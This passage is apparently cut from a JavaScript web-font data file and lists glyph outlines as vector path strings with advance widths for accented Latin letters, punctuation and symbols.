,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0"},{"d":"23,0r0,-186r29,0v1,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0xm85,-206r31,-51r39,0r-47,51r-23,0"},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm146,-271r-27,0r-41,-39r44,0","w":219},{"d":"30,0r0,-257r34,0r0,257r-34,0xm67,-271r0,-38r32,0r0,38r-32,0xm-5,-271r0,-38r32,0r0,38r-32,0","w":93},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm118,-213r0,-38r32,0r0,38r-32,0xm50,-213r0,-38r32,0r0,38r-32,0"},{"d":"3,0r70,-98r-65,-88r40,0r44,65r47,-65r36,0r-64,86r72,100r-39,0r-52,-77r-52,77r-37,0","w":186},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20","w":193},{"d":"22,0r0,-186r29,0r0,39v15,-30,36,-44,69,-43r0,32v-81,-4,-66,83,-67,158r-31,0xm127,-257r-37,51r-33,0r-38,-51r29,0r25,35r25,-35r29,0","w":119},{"d":"22,0r0,-186r29,0r0,39v15,-30,36,-44,69,-43r0,32v-81,-4,-66,83,-67,158r-31,0xm55,-206r31,-51r39,0r-47,51r-23,0","w":119},{"d":"86,0r0,-228r-85,0r0,-29r205,0r0,29r-85,0r0,228r-35,0xm91,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":206},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0"},{"d":"168,-95v0,-35,-17,-68,-57,-68v-41,0,-57,35,-57,70v0,37,16,70,58,70v42,0,56,-36,56,-72xm24,0r0,-257r31,0r0,96v10,-21,34,-29,60,-29v57,0,86,44,86,97v0,53,-28,97,-85,97v-19,0,-47,-7,-61,-29r0,25r-31,0","w":213},{"d":"55,0r-30,0r0,-186r30,0r0,186xm21,-206r30,-51r40,0r-47,51r-23,0","w":79},{"d":"25,0r0,-257r30,0r0,257r-30,0xm72,-229r0,-28r29,0v1,32,2,65,-29,65r0,-13v12,0,15,-12,15,-24r-15,0","w":97},{"d":"40,0r0,-40r40,0r0,40r-40,0xm160,0r0,-40r40,0r0,40r-40,0xm280,0r0,-40r40,0r0,40r-40,0","w":360},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0xm111,-271r24,-39r43,0r-41,39r-26,0","w":259},{"d":"39,-164r0,-93r25,0r0,93r-25,0xm90,-164r0,-93r24,0r0,93r-24,0","w":153},{"d":"-3,0r130,-257r193,0r0,29r-126,0r0,81r118,0r0,29r-118,0r0,89r128,0r0,29r-161,0r0,-75r-88,0r-37,75r-39,0xm161,-228r-14,0r-61,124r75,0r0,-124","w":333},{"d":"198,-182v1,-36,-27,-52,-63,-52v-58,0,-87,50,-87,108v0,57,29,103,86,103v36,0,64,-20,64,-50r0,-109xm198,0r0,-25v-13,20,-41,31,-67,31v-76,0,-117,-59,-117,-134v0,-77,44,-135,120,-135v24,0,54,9,64,27r0,-21r172,0r0,29r-137,0r0,81r126,0r0,29r-126,0r0,89r139,0r0,29r-174,0","w":386},{"d":"189,-186r0,257r-30,0r-1,-96v-10,21,-33,29,-59,29v-57,0,-86,-45,-86,-98v0,-82,93,-130,146,-67r0,-25r30,0xm45,-91v0,35,18,68,58,68v41,0,57,-35,57,-70v0,-37,-17,-70,-59,-70v-42,0,-56,36,-56,72","w":213},{"d":"-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm117,-226v-17,38,-29,81,-45,120r87,0xm94,-310v23,0,57,30,67,-1r18,0v-3,20,-13,41,-39,40v-18,-1,-58,-31,-65,1r-19,0v6,-21,15,-40,38,-40","w":233},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm179,-310r-38,39r-38,0r-39,-39r33,0r25,25r25,-25r32,0","w":219},{"d":"66,-242r0,56r37,0r0,27r-37,0r0,115v-4,19,18,17,37,17r0,27v-40,0,-68,3,-68,-41r0,-118r-32,0r0,-27r32,0r0,-56r31,0xm54,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":113},{"d":"28,0r0,-257r88,0v79,0,124,39,124,122v0,86,-38,135,-124,135r-88,0xm62,-228r0,199r57,0v23,0,87,-6,87,-101v0,-61,-23,-98,-86,-98r-58,0","w":253},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm101,-271r24,-39r43,0r-40,39r-27,0","w":219},{"d":"152,-59r30,0v-2,51,-70,59,-80,98v-3,12,22,18,40,14r0,17v-28,3,-66,6,-66,-26v-2,-8,8,-25,26,-40v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v25,0,44,-12,49,-36xm45,-111r107,0v-1,-29,-23,-52,-53,-52v-32,0,-52,24,-54,52","w":193},{"d":"86,0r0,-228r-85,0r0,-29r205,0r0,29r-85,0r0,228r-35,0","w":206},{"d":"30,0r0,-257r34,0r0,257r-34,0xm27,-271r24,-39r44,0r-41,39r-27,0","w":93},{"d":"243,-180r-34,0v-7,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74r35,0v-6,64,-47,103,-112,103v-80,0,-119,-59,-119,-134v0,-75,43,-135,122,-135v54,0,98,28,106,83xm114,-271r24,-39r43,0r-40,39r-27,0","w":259},{"d":"22,0r0,-186r29,0r0,39v15,-30,36,-44,69,-43r0,32v-81,-4,-66,83,-67,158r-31,0xm22,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":119},{"d":"28,0r0,-257r88,0v79,0,124,39,124,122v0,86,-38,135,-124,135r-88,0xm62,-228r0,199r57,0v23,0,87,-6,87,-101v0,-61,-23,-98,-86,-98r-58,0xm173,-310r-39,39r-38,0r-38,-39r32,0r25,25r25,-25r33,0","w":253},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20xm41,-257r18,0v6,20,19,30,40,30v21,0,29,-12,36,-30r18,0v-5,31,-25,50,-57,50v-33,0,-50,-18,-55,-50","w":193},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm46,-206r37,-51r33,0r38,51r-29,0r-25,-34r-25,34r-29,0"},{"d":"221,-257r-92,257r-39,0r-90,-257r37,0r74,223r74,-223r36,0","w":219},{"d":"13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm50,-206r37,-51r33,0r38,51r-29,0r-25,-34r-26,34r-28,0","w":206},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm180,-271r-32,0r-25,-25r-25,25r-33,0r39,-39r38,0","w":219},{"d":"66,-61r133,-147v-14,-16,-35,-26,-62,-26v-90,0,-108,108,-71,173xm208,-195r-132,147v14,16,34,25,61,25v89,-1,109,-107,71,-172xm249,-263r11,11r-29,32v60,81,25,228,-94,226v-35,0,-63,-12,-83,-31r-29,32r-12,-11r31,-33v-62,-80,-27,-229,93,-226v36,0,63,13,83,32","w":273},{"d":"2,69r6,-16v12,6,45,8,45,-7v0,-11,-22,-14,-32,-8v-13,-14,10,-25,16,-38r15,0v-5,7,-11,12,-15,20v17,-8,44,2,43,24v-3,36,-50,37,-78,25","w":79},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm39,-223r0,-20r122,0r0,20r-122,0"},{"d":"55,-186r0,210v0,39,-24,51,-60,46r0,-26v19,1,30,1,30,-25r0,-205r30,0xm55,-257r0,37r-30,0r0,-37r30,0","w":79},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0xm116,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":259},{"d":"13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm121,-213r0,-38r32,0r0,38r-32,0xm53,-213r0,-38r33,0r0,38r-33,0","w":206},{"d":"70,-204r0,40r-40,0v-1,-44,-2,-92,40,-93r0,18v-16,0,-21,18,-21,35r21,0","w":100},{"d":"181,-126r-32,0v-5,-23,-21,-37,-46,-37v-44,0,-58,34,-58,72v0,34,16,68,55,68v30,0,47,-17,51,-45r31,0v-7,45,-35,72,-82,72v-57,0,-87,-40,-87,-95v0,-56,29,-99,88,-99v42,0,76,20,80,64xm154,-257r-37,51r-34,0r-37,-51r29,0r25,35r25,-35r29,0","w":193},{"d":"28,0r0,-257r34,0r0,228r136,0r0,29r-170,0xm44,-271r24,-39r43,0r-40,39r-27,0"},{"d":"48,-140v10,47,121,19,121,86v0,44,-41,58,-79,58v-42,0,-77,-17,-79,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-50,-122,-19,-122,-88v0,-37,38,-52,70,-52v41,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23","w":180},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,45,26,70,71,70v101,0,58,-143,67,-234r34,0xm147,-271r22,-39r40,0r-37,39r-25,0xm81,-271r22,-39r40,0r-37,39r-25,0","w":259},{"d":"185,-257r0,313r-24,0r0,-293r-44,0r0,293r-24,0r0,-172v-44,0,-76,-30,-76,-67v0,-47,32,-74,82,-74r86,0","w":216},{"d":"211,-97r35,0v-6,63,-46,102,-109,103v-3,5,-8,8,-10,14v17,-8,44,2,43,24v-3,36,-50,37,-78,25r6,-16v12,6,45,8,45,-7v0,-11,-22,-14,-32,-8v-12,-12,5,-22,11,-33v-72,-5,-107,-62,-107,-133v0,-75,43,-135,122,-135v54,0,98,28,106,83r-34,0v-7,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74","w":259},{"d":"28,0r0,-71r-28,20r0,-27r28,-20r0,-159r34,0r0,134r82,-57r0,27r-82,58r0,66r136,0r0,29r-170,0"},{"d":"229,0r-9,-32v-20,27,-52,38,-82,38v-77,0,-123,-62,-123,-129v0,-75,42,-140,123,-140v56,0,100,25,110,85r-34,0v-7,-39,-38,-56,-76,-56v-62,0,-88,54,-88,109v0,54,31,102,88,102v53,0,84,-37,82,-84r-82,0r0,-28r113,0r0,135r-22,0xm127,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":273},{"w":180},{"d":"62,-139v57,-4,130,17,131,-45v0,-25,-14,-44,-46,-44r-85,0r0,89xm198,0v-17,-27,9,-110,-52,-110r-84,0r0,110r-34,0r0,-257r121,0v86,-9,106,110,34,132v56,13,26,86,53,125r-38,0xm175,-310r-39,39r-38,0r-38,-39r33,0r24,25r26,-25r32,0","w":246},{"d":"14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm75,-278r0,-20r123,0r0,20r-123,0","w":273},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,45,26,70,71,70v101,0,58,-143,67,-234r34,0xm112,-271r24,-39r43,0r-40,39r-27,0","w":259},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0xm188,-310r-39,39r-38,0r-39,-39r33,0r25,25r25,-25r33,0","w":259},{"d":"48,-140v10,47,121,19,121,86v0,40,-32,55,-67,58v-4,6,-9,10,-12,16v17,-8,43,2,42,24v-2,36,-49,37,-77,25r6,-16v12,6,43,9,44,-7v1,-11,-21,-14,-31,-8v-12,-12,6,-23,12,-34v-40,-1,-73,-18,-75,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-50,-122,-19,-122,-88v0,-37,38,-52,70,-52v41,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23","w":180},{"d":"24,4v0,-62,67,-63,63,-126r30,0v8,70,-60,68,-60,128v0,26,17,43,43,43v34,0,50,-27,50,-60r31,0v1,49,-31,87,-81,87v-44,0,-76,-26,-76,-72xm121,-186r0,40r-40,0r0,-40r40,0"},{"d":"25,0r0,-257r30,0r0,152r85,-81r41,0r-73,68r79,118r-39,0r-64,-97r-29,26r0,71r-30,0xm85,39r0,-25r29,0v1,30,1,52,-28,55r0,-11v12,-2,15,-10,15,-19r-16,0","w":186},{"d":"140,-257r0,20r-46,0r0,128r-25,0r0,-128r-46,0r0,-20r117,0xm334,-257r0,148r-25,0r0,-124r-49,124r-16,0r-49,-124r0,124r-24,0r0,-148r37,0r45,113r43,-113r38,0","w":356},{"d":"152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v25,0,44,-12,49,-36xm45,-111r107,0v-1,-29,-23,-52,-53,-52v-32,0,-52,24,-54,52","w":193},{"d":"28,6r0,-105r24,0r0,105r-24,0xm52,-263r0,105r-24,0r0,-105r24,0","w":79},{"d":"177,0v-14,6,-36,31,-33,39v-4,11,22,18,40,14r0,17v-28,3,-66,6,-66,-26v0,-10,5,-25,33,-44r-3,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0r0,186"},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,45,26,70,71,70v101,0,58,-143,67,-234r34,0xm155,-271r-26,0r-41,-39r43,0","w":259},{"d":"43,-9r-17,-17r65,-65r-65,-65r17,-18r65,65r65,-65r17,18r-64,65r65,65r-17,17r-66,-65","w":216},{"d":"272,-111v-1,-29,-19,-52,-51,-52v-33,0,-53,22,-53,52r104,0xm139,-96v-27,16,-94,2,-94,46v0,20,17,27,36,27v55,0,61,-27,58,-73xm305,-84r-137,0v-10,60,89,87,103,25r31,0v-9,68,-115,88,-148,27v-22,48,-142,56,-141,-16v0,-42,31,-51,63,-57v45,-9,63,-8,63,-30v0,-25,-21,-28,-42,-28v-26,0,-45,8,-46,35r-31,0v2,-46,38,-62,79,-62v22,0,51,4,62,27v13,-19,37,-27,60,-27v65,0,84,48,84,106","w":313},{"d":"13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm105,-206r-47,-51r39,0r31,51r-23,0","w":206},{"d":"260,-154r0,100r22,0r0,19r-22,0r0,35r-22,0r0,-35r-72,0r0,-20r76,-99r18,0xm238,-124v-20,22,-35,47,-54,70r54,0r0,-70xm54,10r157,-271r23,0r-157,271r-23,0xm79,-255r0,154r-25,0r0,-111r-41,0r0,-18v23,0,44,-5,48,-25r18,0","w":300},{"d":"30,0r0,-40r40,0v2,47,0,82,-40,93r0,-18v16,-5,22,-23,21,-35r-21,0xm70,-186r0,40r-40,0r0,-40r40,0","w":100},{"d":"55,0v-15,7,-34,31,-32,39v-4,11,22,18,40,14r0,17v-28,3,-66,6,-66,-26v0,-10,5,-25,33,-44r-5,0r0,-186r30,0r0,186xm55,-257r0,37r-30,0r0,-37r30,0","w":79},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm81,-231v0,11,9,19,20,19v11,0,20,-8,20,-19v0,-11,-9,-20,-20,-20v-11,0,-20,9,-20,20xm68,-231v0,-18,15,-33,33,-33v18,0,33,15,33,33v0,18,-15,32,-33,32v-18,0,-33,-14,-33,-32"},{"d":"5,-101v-4,-63,87,-61,87,-109v0,-15,-13,-25,-30,-25v-22,0,-30,16,-30,35r-24,0v0,-33,22,-55,55,-55v29,0,53,16,53,45v0,50,-75,56,-86,89r84,0r0,20r-109,0","w":119},{"d":"28,0r0,-257r34,0r0,228r136,0r0,29r-170,0xm103,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0"},{"d":"30,0r0,-257r34,0r0,257r-34,0xm73,-271r-27,0r-40,-39r43,0","w":93},{"d":"177,-257r-5,27v-22,-1,-38,-1,-43,19r-12,49r37,0r-5,25r-36,0v-17,66,-14,207,-88,196r-24,0r5,-27v38,0,44,-3,50,-36r25,-133r-33,0r5,-25r33,0v6,-55,18,-107,91,-95"},{"d":"0,-86r0,-28r180,0r0,28r-180,0","w":180},{"d":"23,0r0,-186r29,0v1,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0xm86,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0"},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,45,26,70,71,70v101,0,58,-143,67,-234r34,0xm112,-290v0,10,7,17,17,17v10,0,18,-7,18,-17v0,-10,-8,-17,-18,-17v-10,0,-17,7,-17,17xm100,-290v0,-17,12,-29,29,-29v17,0,30,12,30,29v0,17,-13,30,-30,30v-17,0,-29,-13,-29,-30","w":259},{"d":"311,-84r-135,0v-1,32,18,61,54,61v24,0,43,-13,50,-36r29,0v-11,71,-115,86,-147,27v-12,27,-36,36,-64,36v-59,0,-85,-44,-85,-97v0,-54,27,-97,85,-97v28,0,52,6,64,32v13,-22,40,-32,66,-32v62,0,86,47,83,106xm176,-111r103,0v0,-31,-19,-52,-51,-52v-32,0,-52,21,-52,52xm149,-94v0,-34,-9,-69,-51,-69v-70,1,-74,139,0,140v41,0,51,-38,51,-71","w":320},{"d":"55,0r-30,0r0,-186r30,0r0,186","w":79},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0","w":259},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20xm45,-206r37,-51r34,0r37,51r-29,0r-25,-34r-25,34r-29,0","w":193},{"d":"68,8r193,-268r31,0r-193,268r-31,0xm211,-67v0,-39,14,-73,58,-73v45,0,58,33,58,72v0,37,-16,72,-58,72v-44,0,-58,-32,-58,-71xm238,-68v0,21,3,53,30,53v27,0,32,-31,32,-53v0,-21,-4,-52,-31,-52v-27,0,-31,30,-31,52xm33,-182v0,-39,14,-73,58,-73v45,0,58,33,58,72v0,37,-16,72,-58,72v-44,0,-58,-32,-58,-71xm60,-183v0,21,3,52,30,52v27,0,32,-30,32,-52v0,-21,-4,-52,-31,-52v-27,0,-31,30,-31,52","w":360},{"d":"199,-140r0,25r-182,0r0,-25r182,0xm17,-42r0,-25r182,0r0,25r-182,0","w":216},{"d":"37,0r10,-74r-35,0r0,-25r39,0r7,-54r-36,0r0,-24r40,0r10,-74r25,0r-11,74r45,0r10,-74r25,0r-10,74r32,0r0,24r-35,0r-8,54r33,0r0,25r-37,0r-10,74r-25,0r11,-74r-45,0r-10,74r-25,0xm128,-153r-45,0r-7,54r44,0"},{"d":"-6,6r106,-269r26,0r-106,269r-26,0","w":119},{"d":"28,0r0,-122r-25,0r0,-25r25,0r0,-110r88,0v79,0,124,39,124,122v0,86,-38,135,-124,135r-88,0xm62,-228r0,81r77,0r0,25r-77,0r0,93r57,0v23,0,87,-6,87,-101v0,-61,-23,-98,-86,-98r-58,0","w":253},{"d":"207,0v-23,-1,-40,31,-40,39v0,7,3,15,23,15v4,0,10,0,16,-1r0,17v-28,3,-66,6,-66,-26v0,-10,6,-25,34,-44r-146,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29","w":219},{"d":"13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm81,-255v23,1,58,32,67,-1r19,0v-3,20,-13,42,-40,40v-12,0,-35,-14,-47,-14v-8,0,-19,6,-18,15r-18,0v6,-21,14,-40,37,-40","w":206},{"d":"-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm117,-226v-17,38,-29,81,-45,120r87,0xm147,-271r-27,0r-41,-39r43,0","w":233},{"d":"23,0r0,-191v0,-43,28,-72,71,-72v35,0,75,21,75,63v0,27,-11,47,-38,56v84,21,50,156,-34,148v-5,0,-10,0,-15,-1r0,-27v39,6,66,-16,66,-51v0,-47,-26,-54,-66,-54r0,-25v29,2,54,-8,54,-41v0,-23,-17,-41,-40,-41v-25,0,-42,10,-42,50r0,186r-31,0"},{"d":"64,0v-14,5,-37,31,-34,39v-4,11,22,18,40,14r0,17v-28,3,-66,6,-66,-26v0,-10,5,-25,33,-44r-7,0r0,-257r34,0r0,257","w":93},{"d":"243,-180r-34,0v-7,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74r35,0v-6,64,-47,103,-112,103v-80,0,-119,-59,-119,-134v0,-75,43,-135,122,-135v54,0,98,28,106,83","w":259},{"d":"9,-169v-9,-45,84,-29,85,-51v0,-16,-14,-17,-28,-17v-17,0,-29,5,-30,20r-22,0v1,-28,25,-38,53,-38v22,0,47,5,47,31r0,58v-1,14,5,11,13,10r0,16v-13,6,-34,3,-34,-13v-20,24,-84,23,-84,-16xm93,-197v-15,12,-59,2,-60,27v6,31,68,8,60,-10r0,-17","w":136},{"d":"47,-72v0,31,22,49,54,49v31,0,52,-21,52,-49v0,-28,-23,-49,-52,-49v-30,0,-54,19,-54,49xm23,-190v0,-42,36,-65,75,-65v89,-2,100,90,42,118v31,10,46,32,46,64v0,49,-38,77,-85,77v-49,0,-87,-25,-87,-77v0,-30,17,-54,45,-64v-21,-9,-36,-30,-36,-53xm56,-189v0,28,20,41,45,41v24,0,42,-15,42,-41v0,-26,-18,-39,-43,-39v-24,0,-44,13,-44,39"},{"d":"266,-154r0,100r22,0r0,19r-22,0r0,35r-22,0r0,-35r-72,0r0,-20r76,-99r18,0xm190,-53r54,0r0,-69xm77,10r157,-271r23,0r-157,271r-23,0xm64,-172r0,-18v20,1,38,-3,38,-23v0,-14,-11,-22,-27,-22v-19,0,-29,13,-29,31r-25,0v2,-31,22,-51,54,-51v50,0,72,57,27,72v18,7,32,19,32,38v0,32,-29,47,-59,47v-32,0,-57,-18,-57,-51r24,0v0,20,12,31,33,31v18,0,34,-10,34,-26v-1,-24,-21,-30,-45,-28","w":300},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm102,-206r-48,-51r40,0r31,51r-23,0"},{"d":"152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v25,0,44,-12,49,-36xm45,-111r107,0v-1,-29,-23,-52,-53,-52v-32,0,-52,24,-54,52xm116,-213r0,-38r32,0r0,38r-32,0xm48,-213r0,-38r33,0r0,38r-33,0","w":193},{"d":"196,-10v-46,44,-117,-23,-162,14r-17,-24v31,-18,52,-60,31,-98r-31,0r0,-16r21,0v-10,-16,-17,-34,-17,-56v0,-46,38,-73,82,-73v53,0,86,31,85,93r-31,0v-1,-41,-17,-66,-52,-66v-29,0,-52,20,-52,47v0,24,11,37,19,55r57,0r0,16r-49,0v20,39,-6,75,-35,95v40,-26,102,20,135,-11"},{"d":"55,0r-30,0r0,-186r30,0r0,186xm4,-223r0,-20r72,0r0,20r-72,0","w":79},{"d":"98,-25v72,0,77,-137,2,-138v-39,0,-55,31,-55,67v0,33,13,71,53,71xm184,-186v-7,109,35,262,-87,262v-35,0,-75,-14,-77,-55r31,0v1,22,28,30,48,30v44,1,61,-37,55,-83v-10,23,-35,34,-58,34v-55,0,-83,-43,-83,-94v0,-44,22,-98,86,-98v24,-1,43,12,56,31r0,-27r29,0xm114,-230r0,24r-29,0v-1,-29,-1,-51,28,-54r0,11v-12,2,-15,10,-15,19r16,0","w":206},{"d":"233,-257r-99,152r0,105r-34,0r0,-105r-99,-152r40,0r77,122r76,-122r39,0","w":233},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm135,-309r0,38r-32,0r0,-38r32,0","w":219},{"d":"14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm114,-310v23,0,57,30,67,-1r18,0v-3,20,-13,41,-39,40v-18,-1,-58,-31,-65,1r-19,0v6,-21,15,-40,38,-40","w":273},{"d":"-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm117,-226v-17,38,-29,81,-45,120r87,0xm55,-278r0,-20r123,0r0,20r-123,0","w":233},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm140,-271r0,-38r32,0r0,38r-32,0xm68,-271r0,-38r32,0r0,38r-32,0","w":219},{"d":"30,71v-2,-68,4,-130,9,-191r16,0r9,112r0,79r-34,0xm67,-186r0,40r-40,0r0,-40r40,0","w":93},{"d":"-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm117,-226v-17,38,-29,81,-45,120r87,0xm100,-290v0,10,7,17,17,17v10,0,18,-7,18,-17v0,-10,-8,-17,-18,-17v-10,0,-17,7,-17,17xm88,-290v0,-17,12,-29,29,-29v17,0,30,12,30,29v0,17,-13,30,-30,30v-17,0,-29,-13,-29,-30","w":233},{"d":"13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm58,-206r29,-51r38,0r-43,51r-24,0xm118,-206r29,-51r38,0r-44,51r-23,0","w":206},{"d":"-21,-223r0,-20r123,0r0,20r-123,0","w":79},{"d":"14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm116,-271r24,-39r43,0r-40,39r-27,0","w":273},{"d":"167,2v-22,3,-40,22,-42,37v-4,11,22,18,40,14r0,17v-28,3,-67,6,-67,-26v0,-9,5,-21,26,-38v-61,-2,-97,-33,-97,-99r0,-164r34,0r0,164v0,45,26,70,71,70v101,0,58,-143,67,-234r34,0v-5,103,27,245,-66,259","w":259},{"d":"151,-68r31,0v-6,44,-33,70,-77,72v-3,5,-12,11,-11,16v17,-8,43,2,42,24v-3,36,-50,37,-78,25r7,-16v12,6,44,9,44,-7v0,-11,-22,-14,-32,-8v-13,-13,7,-23,14,-34v-51,-4,-78,-43,-78,-95v0,-56,29,-99,88,-99v42,0,76,20,80,64r-32,0v-5,-23,-21,-37,-46,-37v-44,0,-58,34,-58,72v0,34,16,68,55,68v30,0,47,-17,51,-45","w":193},{"d":"84,0r0,-63r-51,0r0,-21r51,0v1,-13,-2,-2